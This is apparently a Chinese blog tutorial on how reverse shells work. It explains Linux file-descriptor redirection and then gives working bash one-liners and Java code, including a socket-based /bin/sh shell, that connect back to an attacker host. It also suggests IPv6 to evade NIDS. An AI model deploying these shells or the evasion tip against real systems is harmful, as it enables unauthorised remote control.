使用Java反弹shell

前言

最近一直在看反弹shell,网上也有大量地一句话反弹shell,如各种环境下反弹 shell 的方法,linux各种一句话反弹shell总结。但是鲜有文章讲明这些反弹shell的原理。即使有文章讲,但是感觉也没有讲清楚。这个问题也一直困扰了很久,通过自己查阅资料,问朋友,做实验,最终才将这个问题差不多搞懂了。如果文章中有不对的地方也欢迎各位师傅来交流。

反弹shell举例

最常见的反弹shell的写法是:

1
bash -i >& /dev/tcp/ip/port 0>&1

在讲解具体的反弹shell的原理时,我们首先必须要了解Linux中文件描述符和重定向这两个概念。

文件描述符&重定向

首先需要知道在Linux中一些基本的尝试,如文件描述符(File Descriptor,fd)。在Linux中有如下的定义:

  • 文件描述符0 表示标准输入
  • 文件描述符1 表示标准输出
  • 文件描述符2 表示标准错误

所以在一般情况下,文件描述符表的指向如下:

在Linux中,>表示重定向的含义。表示将一个命令的输出输入重定向到另外一个地方。比如我们使用ls -all > tmp.txt,就是表示我们将ls -all的结果不是直接在terminal上面输出,而是写入到tmp.txt文件中。

其实在Linux下本质的原因是,命令command > file就等价于command 1>file。由于1表示的是标准输出。由于出现了1>file,所以文件描述符表就会发生变化。此时变为了:

Bash会打开文件file,然后将文件描述符1的指针指向file。所以所有的输出是写入到文件描述1,由于现在文件描述符1已经指向了file,所有所有的输出全部都会写入到文件中。这也就是为什么当我们使用类似于ls -all > tmp.txt时,ls -all的结果会全部写入到tmp.txt中。

这个只是一些最基本的情况。我们在反弹shell中可能最常见的命令是>&或者&>。我们进一步进行说明。命令command &>file(也等同于command >&file,此后这种情况将不再作说明)。这个&>就是将command命令的输出和错误全部重定向到file中,这是一种快速简单的重定向的写法。所以执行command >&file之后,文件描述符变为了:

其实command >&file这种写法也等价于command >file 2>&1。(其中2>&1表示的就是将文件描述符2重定向到文件描述符1)。下图展示了这个文件描述表的变化过程。

需要注意的是,在Linux中文件的重定向的顺序是非常重要的。上述的command >file 2>&1command 2>&1 >file执行得到的结果是完全不一样的。下图展示的是command 2>&1 >file的文件描述符的变化过程。

通过文件描述符的最终状态就可以看出来,最终执行完毕command 2>&1 >file,只有文件描述符1指向的是file。这样的情况和command >file 2>&1是完全不一定的。

更多地关于文件描述符的详情可以参考文章Bash One-Liners Explained, Part III: All about redirections

特殊情况

在上一节中讲到的文件描述符0、1、2d都是系统默认的文件描述符,所以3之后的数字我们都可以自行使用。以下就用一个简单的例子来说明:

  1. echo "123456">test.txt是创建一个test.txt,文件内容是123456
  2. exec 3<test.txt,创建文件描述符3,并将文件描述符3指向test.txt
  3. grep "1" < &3,此时文件描述符3充当了文件描述符1的功能,作为了grep命令的输入,最终查询得到了结果

但是还有一类比较特殊的文件重定向用法<>,表示同时对文件进行读写操作。示例如下:

  1. echo "456789">test2.txt 创建test2.txt文件,文件内容是456789
  2. exec 5<> test2.txt,以读写模式打开托test2.txt,同时将文件描述符5指向test2.txt
  3. read -n 3 var <&5,从文件描述符5中读取前3个字符
  4. echo $var,打印得到456。

反弹shell分析

上一节的两种方式都是可以用作反弹shell的,分别是bash -i >& /dev/tcp/ip/port 0>&1这种方式以及bash -i 5<>/dev/tcp/host/port 0>&5 1>&5方式。这两种方式的原理其实都是类似,下面对其进行简要的分析。

方式一

1
bash -i >& /dev/tcp/ip/port 0>&1
  • bash -i 创建一个交互式的bash进程
  • /dev/tcp/ip/port,linux中所有的程序都是以文件的形式存在。这句话的意思与ip:port建立了一个TCP连接。
  • >& command >&file这种写法也等价于command >file 2>&1。(其中2>&1表示的就是将文件描述符2重定向到文件描述符1)
  • 0>&1 将标准输入重定向到标准输出。

下图说明了上述命令的文件描述符的变化过程。

通过整个变化过程,我们就可以很清晰地看到最终是完成了反弹shell。

方式二

1
bash -i 5<>/dev/tcp/host/port 0>&5 1>&5

同理,我们按照上述的分析方法对这个反弹shell进行分析。

  • 5<>/dev/tcp/host/port,以读写的方式打开/dev/tcp/host/port,并将文件描述符5重定向到/dev/tcp/host/port
  • 0>&5,将文件描述符0(标准输入)重定向至文件描述符5
  • 1>&5,将文件描述符1(标准输出)重定向至文件描述符5

下图说明了上述命令的文件描述符的变化过程。

最终的效果就是文件描述符0(标准输入)和文件描述1(标准输出)全部都重定向到/dev/tcp/host/port,从而就完成了反弹shell。

方式三

1
exec 5<>/dev/tcp/ip/port;cat <&5 | while read line; do $line >&5; done
  1. exec 5<>/dev/tcp/ip/port,以读写的方式打开/dev/tcp/ip/port,并将文件描述符5重定向到/dev/tcp/ip/port
  2. cat <&5,将文件描述符5的重定向到cat中,即cat读取到&5的内容。结合1就是cat会读取/dev/tcp/ip/port中shell的输入内容。
  3. |,管道符。将cat读取的结果作为后面的输入;
  4. while read line; do $line >&5; done,拆开看。while do done是shell中while的规定语法。其中read line;表示的就是会循环读取cat <&5的内容,赋值到line变量中,之后$line会执行line语句中的命令,最后>&5,表示将当前bash的输出和错误重定向至文件描述符5中,即/dev/tcp/ip/port

下图说明了上述命令的文件描述符的变化过程。

相信通过上面的三个例子应该对不同形式下的反弹shell有个清新地认识,至于不同版本或者是不同语言的反弹shell其实都是上面的变形而已。

写完之后才发现在先知上已经有两篇很详细地文章了,Linux反弹shell(一)文件描述符与重定向Linux 反弹shell(二)反弹shell的本质

java反弹shell

常见方式

说到Java发弹shell,网上所有的java反弹shell使用的都是:

1
2
3
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.31.41/8080;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])
p.waitFor()

首先["a","b","c] as String[]这种写法没有见过,至少我在jdk1.8上面测试是失败的,正常的写法应该是new String[]{"a","b","c"}这种写法。那么上述的写法就变为:

1
2
3
Runtime r = Runtime.getRuntime();
Process p = r.exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/ip/port;cat <&5 | while read line; do $line 2>&5 >&5; done"});
p.waitFor();

可以发现能够成功地反弹shell。

举一反三,既然上述的这种可以,那么下面这种也同样可以:

1
2
3
Runtime r = Runtime.getRuntime();
Process p = r.exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/ip/port 0>&1"});
p.waitFor();

通过分析,其实上面的这两种反弹shell的命令非常容易理解。/bin/bash是需要运行的程序。而-cbash -i >& /dev/tcp/ip/port 0>&1都是作为/bin/bash的参数,我们都知道bash -c "cmd string",就是使用shell去运行cmd string字符串,所以上述的命令就是利用shell运行bash -i >& /dev/tcp/ip/port 0>&1,这就和直接在bash中输入bash -i >& /dev/tcp/ip/port 0>&1的效果是一样的。

当然像这样的例子还能够写很多。

特殊方式

上面说的反弹shell的方式其实还是利用常见的bash反弹shell的原理。既然在java中也存在socket,那么我们就可以直接利用Java中的socket建立连接进行反弹shell。如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
String host=host;
int port=port;
String cmd="/bin/sh";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()) {
while(pi.available()>0) {
so.write(pi.read());
}
while(pe.available()>0) {
so.write(pe.read());
}
while(si.available()>0) {
po.write(si.read());
}
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
}
catch (Exception e){
}
};
p.destroy();
s.close();

我们直接通过Socket s=new Socket(host,port);这种方式,按照https://docs.oracle.com/javase/7/docs/technotes/guides/net/ipv6_guide/的说明:

You can run the same bytecode for this example in IPv6 mode if both your local host machine and the destination machine (taranis) are IPv6-enabled.

即如果目标机器和本地机器都支持IPv6,则使用IPv6。在本地实际测试的结果也是如此:

这种特性有什用呢?其实很多NIDS考虑到目前大部分的网络行为都是IPv4的,所以基本都是检测的IPv4的地址,也就是说IPv6的通信流量有一定的概率能够绕过NIDS的检测。

参考

  1. http://www.catonmat.net/blog/bash-one-liners-explained-part-three/
  2. https://www.00theway.org/2017/07/11/bash%20%E5%8F%8D%E5%BC%B9shell/